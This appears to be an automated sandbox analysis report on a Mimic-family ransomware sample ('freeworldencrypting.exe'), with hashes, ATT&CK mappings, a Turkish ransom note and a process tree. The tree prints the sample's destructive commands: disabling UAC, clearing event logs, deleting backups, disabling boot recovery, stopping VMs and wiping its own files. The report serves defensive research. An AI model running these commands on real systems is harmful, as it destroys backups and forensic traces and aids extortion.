Analysis
max time kernel: 676s
max time network: 1150s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 21-09-2024 14:34
Behavioral tasks
behavioral1: Sample samples.zip, Resource win7-20240903-en
behavioral2: Sample samples.zip, Resource win10v2004-20240802-en
behavioral3: Sample samples/$I30, Resource win7-20240903-en
behavioral4: Sample samples/$I30, Resource win10v2004-20240802-en
behavioral5: Sample samples/Everything.db, Resource win7-20240704-en
behavioral6: Sample samples/Everything.db, Resource win10v2004-20240802-en
behavioral7: Sample samples/Everything.db.fileslack, Resource win7-20240903-en
behavioral8: Sample samples/Everything.db.fileslack, Resource win10v2004-20240802-en
behavioral9: Sample samples/Everything.exe, Resource win7-20240903-en
behavioral10: Sample samples/Everything.exe, Resource win10v2004-20240802-en
behavioral11: Sample samples/Everything.ini, Resource win7-20240903-en
behavioral12: Sample samples/Everything.ini, Resource win10v2004-20240802-en
behavioral13: Sample samples/Everything.ini.fileslack, Resource win7-20240903-en
behavioral14: Sample samples/Everything.ini.fileslack, Resource win10v2004-20240802-en
behavioral15: Sample samples/Everything32.dll, Resource win7-20240704-en
behavioral16: Sample samples/Everything32.dll, Resource win10v2004-20240802-en
behavioral17: Sample samples/Everything32.dll.fileslack, Resource win7-20240708-en
behavioral18: Sample samples/Everything32.dll.fileslack, Resource win10v2004-20240802-en
behavioral19: Sample samples/Everything64.7z, Resource win7-20240903-en
behavioral20: Sample samples/Everything64.7z, Resource win10v2004-20240802-en
behavioral21: Sample samples/freeworldencrypting.exe, Resource win7-20240903-en
behavioral22: Sample samples/freeworldencrypting.exe, Resource win10v2004-20240802-en
behavioral23: Sample samples/session.tmp, Resource win7-20240903-en
behavioral24: Sample samples/session.tmp, Resource win10v2004-20240802-en
General
Target: samples/freeworldencrypting.exe
Size: 2.0MB
MD5: 22c109d5539b862d629daa01673352cd
SHA1: 2eed43bf7f139243d9ef93bf4ed0903ced8a08b5
SHA256: f5a331009d6e46236036c2de3578f2a8414742271ed4b23496859c8b99f5c4de
SHA512: 3d251c3c633f24b1ddf7d1f5dcf8a2c8093c892c0a1e5577aec8dc01fcf50aebdc0d481c96f65d83dadd7a7873c2e8013761b16728bd5f6e3621977b2ae46bc2
SSDEEP: 49152:wa/RPnb1b+uL5KTu8l6VP/DOdmGtPY4ldP1nKESY:wa/RTd56M9/DmmGmMP
Malware Config
Signatures
-
Detects Mimic ransomware 1 IoCs
resource: behavioral22/files/0x00070000000234e5-23.dat
yara_rule: family_mimic
Mimic
Ransomware family was first exploited in the wild in 2022.
-
description ioc Process
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" freeworldencrypting.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" freeworldencrypting.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" freeworldencrypting.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" freeworldencrypting.exe
Clears Windows event logs 1 TTPs 3 IoCs
pid Process 4420 wevtutil.exe 2068 wevtutil.exe 1300 wevtutil.exe -
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 4144 bcdedit.exe 4272 bcdedit.exe -
pid Process 4380 wbadmin.exe -
pid Process 4812 wbadmin.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs
Executes dropped EXE 6 IoCs
pid Process 924 freeworldencrypting.exe 2144 freeworldencrypting.exe 3216 freeworldencrypting.exe 3640 freeworldencrypting.exe 892 Everything.exe 4260 Everything.exe -
Loads dropped DLL 4 IoCs
pid Process 924 freeworldencrypting.exe 2144 freeworldencrypting.exe 3216 freeworldencrypting.exe 3640 freeworldencrypting.exe -
Modifies system executable filetype association 2 TTPs 10 IoCs
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\freeworldencrypting = "\"C:\\Users\\Admin\\AppData\\Local\\D18EE4FE-214C-FF0E-6542-D9DFD58DEE88\\freeworldencrypting.exe\" " freeworldencrypting.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\freeworldencrypting.exe = "notepad.exe \"C:\\Users\\Admin\\AppData\\Local\\HACKLENDINIZ.txt\"" freeworldencrypting.exe
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" freeworldencrypting.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Power Settings 1 TTPs 15 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
Drops file in Windows directory 3 IoCs
description ioc Process
File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.2.etl wbadmin.exe
File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.1.etl wbadmin.exe
File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.3.etl wbadmin.exe
pid Process 2300 powershell.exe 4988 powershell.exe 3616 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 15 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1844 cmd.exe 4052 PING.EXE -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 vds.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName vds.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 vds.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe
Modifies registry class 19 IoCs
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 1004 notepad.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4052 PING.EXE -
Suspicious behavior: EnumeratesProcesses 46 IoCs
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 892 Everything.exe 4260 Everything.exe -
Suspicious use of WriteProcessMemory 64 IoCs
System policy modification 1 TTPs 13 IoCs
description ioc Process
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" freeworldencrypting.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" freeworldencrypting.exe
Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer freeworldencrypting.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\HidePowerOptions = "1" freeworldencrypting.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\DataCollection freeworldencrypting.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System freeworldencrypting.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" freeworldencrypting.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = " " freeworldencrypting.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0" freeworldencrypting.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" freeworldencrypting.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "Sisteminizdeki bir güvenlik açığını kullanarak sisteminizi şifreledim.\nBilgilerinizi istiyorsanız bize ödeme yapmalısınız.\nSisteminizde kullandığım fidye yazılımı projesi tamamen özel bir projedir. Kırılamaz. çözülemez.\nSize yardımcı olabileceğini söyleyen kişiler sıklıkla bize gelerek sizin adınıza yardım talebinde bulunuyorlar.\nBu durumda normalde ödediğinizden daha fazla ödemek zorunda kalacaksınız. Doğrudan bizimle iletişime geçmeniz durumunda ödeyeceğiniz ücret daha düşük olacaktır.\nBize güvenmiyor olabilirsiniz. Ama size yardımcı olmak için elimizden geleni yapıyoruz.\n48 saat içerisinde verilerini açıp sizi yardım ettiğimiz bir firmaya yönlendirebiliriz.\nDünyanın her yerinde referanslarımızın olduğunu bilmenizi isteriz.\nŞifrelenmiş verileri açacağız. Bu bizim işimiz. Para alıyoruz ve yardım ediyoruz. Güvenlik açıklarınızı kapatıyoruz. Güvenliğinizi sağlıyoruz ve tavsiyelerde bulunuyoruz.\nBizden satın alacağınız şey sadece verileriniz değildir. aynı zamanda güvenliğiniz\nAmacımız hacklenen sistemleri size geri döndürmek.\nAncak hizmetlerimizin karşılığını almak istiyoruz.\nSizden istediğimiz en önemli şey. Hızlı olmalısın. İletişim kurarken hızlı tepki verin ve durumu hızlı bir şekilde çözün. Zaman kaybetmek istemiyoruz.\nŞifrelenmiş verileri açabildiğimizi size kanıtlayabiliriz.\nSizin için önemli olmayan .png, jpg, avi, pdf dosya uzantılarına sahip istediğiniz örnek dosyayı gönderebilirsiniz. Dosyayı çalışır durumda size geri göndereceğiz. \nDosya limitimiz 3'tür. Daha fazlasını sizin için ücretsiz açamayız.\nVeritabanı dosyalarınızı bize gönderebilirsiniz. Veritabanı dosyanızı çalıştırdıktan sonra size istediğiniz tablonun ekran görüntüsünü gönderebiliriz.\n\nE-posta adresi: [email protected]\n\nBu Anahtarı Bize Göndereceksiniz: yltAiCdUX9ecl0T6bZvP0MYU7-MfiX-rFT6oZNn1kFU*EncryptedDATA" freeworldencrypting.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\DataCollection\AllowTelemetry = "0" freeworldencrypting.exe
Key created \REGISTRY\MACHINE\SOFTWARE\MICROSOFT\Windows\CurrentVersion\Policies\System freeworldencrypting.exe
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\samples\freeworldencrypting.exe (depth 1)
"C:\Users\Admin\AppData\Local\Temp\samples\freeworldencrypting.exe"
- Modifies system executable filetype association
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4912 -
C:\Users\Admin\AppData\Local\D18EE4FE-214C-FF0E-6542-D9DFD58DEE88\freeworldencrypting.exe (depth 2)
"C:\Users\Admin\AppData\Local\D18EE4FE-214C-FF0E-6542-D9DFD58DEE88\freeworldencrypting.exe"
- UAC bypass
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Loads dropped DLL
- Modifies system executable filetype association
- Adds Run key to start application
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:924 -
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd.exe /c DC.exe /D
- System Location Discovery: System Language Discovery
PID:3132
-
-
C:\Users\Admin\AppData\Local\D18EE4FE-214C-FF0E-6542-D9DFD58DEE88\freeworldencrypting.exe (depth 3)
"C:\Users\Admin\AppData\Local\D18EE4FE-214C-FF0E-6542-D9DFD58DEE88\freeworldencrypting.exe" -e watch -pid 924 -!
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2144
-
-
C:\Users\Admin\AppData\Local\D18EE4FE-214C-FF0E-6542-D9DFD58DEE88\freeworldencrypting.exe (depth 3)
"C:\Users\Admin\AppData\Local\D18EE4FE-214C-FF0E-6542-D9DFD58DEE88\freeworldencrypting.exe" -e ul1
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3216
-
-
C:\Users\Admin\AppData\Local\D18EE4FE-214C-FF0E-6542-D9DFD58DEE88\freeworldencrypting.exe (depth 3)
"C:\Users\Admin\AppData\Local\D18EE4FE-214C-FF0E-6542-D9DFD58DEE88\freeworldencrypting.exe" -e ul2
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3640
-
-
C:\Users\Admin\AppData\Local\D18EE4FE-214C-FF0E-6542-D9DFD58DEE88\Everything.exe (depth 3)
"C:\Users\Admin\AppData\Local\D18EE4FE-214C-FF0E-6542-D9DFD58DEE88\Everything.exe" -startup
- Executes dropped EXE
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:892
-
-
C:\Windows\SYSTEM32\powercfg.exe (depth 3)
powercfg.exe -H off
- Power Settings
PID:2236
-
-
C:\Windows\SYSTEM32\powercfg.exe (depth 3)
powercfg.exe -SETACVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 7648efa3-dd9c-4e3e-b566-50f929386280 0
- Power Settings
PID:116
-
-
C:\Windows\SYSTEM32\powercfg.exe (depth 3)
powercfg.exe -SETACVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 96996bc0-ad50-47ec-923b-6f41874dd9eb 0
- Power Settings
PID:3524
-
-
C:\Windows\SYSTEM32\powercfg.exe (depth 3)
powercfg.exe -SETACVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
- Power Settings
PID:3888
-
-
C:\Windows\SYSTEM32\powercfg.exe (depth 3)
powercfg.exe -SETDCVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 7648efa3-dd9c-4e3e-b566-50f929386280 0
- Power Settings
PID:3768
-
-
C:\Windows\SYSTEM32\powercfg.exe (depth 3)
powercfg.exe -SETDCVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 96996bc0-ad50-47ec-923b-6f41874dd9eb 0
- Power Settings
PID:2448
-
-
C:\Windows\SYSTEM32\powercfg.exe (depth 3)
powercfg.exe -SETDCVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
- Power Settings
PID:5076
-
-
C:\Windows\SYSTEM32\powercfg.exe (depth 3)
powercfg.exe -SETACVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 7648efa3-dd9c-4e3e-b566-50f929386280 0
- Power Settings
PID:224
-
-
C:\Windows\SYSTEM32\powercfg.exe (depth 3)
powercfg.exe -SETACVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 96996bc0-ad50-47ec-923b-6f41874dd9eb 0
- Power Settings
PID:1160
-
-
C:\Windows\SYSTEM32\powercfg.exe (depth 3)
powercfg.exe -SETACVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
- Power Settings
PID:1412
-
-
C:\Windows\SYSTEM32\powercfg.exe (depth 3)
powercfg.exe -SETDCVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 7648efa3-dd9c-4e3e-b566-50f929386280 0
- Power Settings
PID:2020
-
-
C:\Windows\SYSTEM32\powercfg.exe (depth 3)
powercfg.exe -SETDCVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 96996bc0-ad50-47ec-923b-6f41874dd9eb 0
- Power Settings
PID:1796
-
-
C:\Windows\SYSTEM32\powercfg.exe (depth 3)
powercfg.exe -SETDCVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
- Power Settings
PID:3480
-
-
C:\Windows\SYSTEM32\powercfg.exe (depth 3)
powercfg.exe -S 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c
- Power Settings
PID:396
-
-
C:\Windows\SYSTEM32\powercfg.exe (depth 3)
powercfg.exe -S e9a42b02-d5df-448d-aa00-03f14749eb61
- Power Settings
PID:4676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
powershell.exe -ExecutionPolicy Bypass "Get-VM | Stop-VM"
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3616
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
powershell.exe -ExecutionPolicy Bypass "Get-VM | Select-Object vmid | Get-VHD | %{Get-DiskImage -ImagePath $_.Path; Get-DiskImage -ImagePath $_.ParentPath} | Dismount-DiskImage"
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4988
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
powershell.exe -ExecutionPolicy Bypass "Get-Volume | Get-DiskImage | Dismount-DiskImage"
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2300
-
-
C:\Windows\SYSTEM32\bcdedit.exe (depth 3)
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
- Modifies boot configuration data using bcdedit
PID:4144
-
-
C:\Windows\SYSTEM32\bcdedit.exe (depth 3)
bcdedit.exe /set {default} recoveryenabled no
- Modifies boot configuration data using bcdedit
PID:4272
-
-
C:\Windows\SYSTEM32\wbadmin.exe (depth 3)
wbadmin.exe DELETE SYSTEMSTATEBACKUP
- Deletes System State backups
- Drops file in Windows directory
PID:4380
-
-
C:\Windows\SYSTEM32\wbadmin.exe (depth 3)
wbadmin.exe delete catalog -quiet
- Deletes backup catalog
PID:4812
-
-
C:\Users\Admin\AppData\Local\D18EE4FE-214C-FF0E-6542-D9DFD58DEE88\Everything.exe (depth 3)
"C:\Users\Admin\AppData\Local\D18EE4FE-214C-FF0E-6542-D9DFD58DEE88\Everything.exe" -startup
- Executes dropped EXE
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4260
-
-
C:\Windows\SysWOW64\notepad.exe (depth 3)
notepad.exe "C:\Users\Admin\AppData\Local\HACKLENDINIZ.txt"
- System Location Discovery: System Language Discovery
- Opens file in notepad (likely ransom note)
PID:1004
-
-
C:\Windows\SysWOW64\wevtutil.exe (depth 3)
wevtutil.exe cl security
- Clears Windows event logs
- System Location Discovery: System Language Discovery
PID:1300
-
-
C:\Windows\SysWOW64\wevtutil.exe (depth 3)
wevtutil.exe cl system
- Clears Windows event logs
- System Location Discovery: System Language Discovery
PID:2068
-
-
C:\Windows\SysWOW64\wevtutil.exe (depth 3)
wevtutil.exe cl application
- Clears Windows event logs
- System Location Discovery: System Language Discovery
PID:4420
-
-
C:\Windows\SysWOW64\cmd.exe (depth 3)
cmd.exe /d /c "ping 127.2 -n 5 & fsutil file setZeroData offset=0 length=20000000 "C:\Users\Admin\AppData\Local\D18EE4FE-214C-FF0E-6542-D9DFD58DEE88\freeworldencrypting.exe" & cd /d "C:\Users\Admin\AppData\Local\D18EE4FE-214C-FF0E-6542-D9DFD58DEE88" & Del /f /q /a *.exe *.ini *.dll *.bat *.db"
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:1844 -
C:\Windows\SysWOW64\PING.EXE (depth 4)
ping 127.2 -n 5
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4052
-
-
C:\Windows\SysWOW64\fsutil.exe (depth 4)
fsutil file setZeroData offset=0 length=20000000 "C:\Users\Admin\AppData\Local\D18EE4FE-214C-FF0E-6542-D9DFD58DEE88\freeworldencrypting.exe"
- System Location Discovery: System Language Discovery
PID:3368
-
-
-
-
C:\Windows\System32\Systray.exe (depth 1)
C:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
PID:880
-
C:\Windows\System32\Systray.exe (depth 1)
C:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
PID:4688
-
C:\Windows\System32\Systray.exe (depth 1)
C:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
PID:3684
-
C:\Windows\System32\Systray.exe (depth 1)
C:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
PID:4380
-
C:\Windows\System32\Systray.exe (depth 1)
C:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
PID:4332
-
C:\Windows\System32\Systray.exe (depth 1)
C:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
PID:4680
-
C:\Windows\System32\Systray.exe (depth 1)
C:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
PID:2252
-
C:\Windows\System32\Systray.exe (depth 1)
C:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
PID:5104
-
C:\Windows\System32\Systray.exe (depth 1)
C:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
PID:1804
-
C:\Windows\system32\vssvc.exe (depth 1)
C:\Windows\system32\vssvc.exe
PID:804
-
C:\Windows\system32\wbengine.exe (depth 1)
"C:\Windows\system32\wbengine.exe"
PID:540
-
C:\Windows\System32\vdsldr.exe (depth 1)
C:\Windows\System32\vdsldr.exe -Embedding
PID:5048
-
C:\Windows\System32\vds.exe (depth 1)
C:\Windows\System32\vds.exe
- Checks SCSI registry key(s)
PID:4408
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Event Triggered Execution (2)
  - Change Default File Association (1)
  - Image File Execution Options Injection (1)
- Power Settings (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Event Triggered Execution (2)
  - Change Default File Association (1)
  - Image File Execution Options Injection (1)
Defense Evasion
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Impair Defenses (1)
  - Disable or Modify Tools (1)
- Indicator Removal (3)
  - Clear Windows Event Logs (1)
  - File Deletion (2)
- Modify Registry (4)
Downloads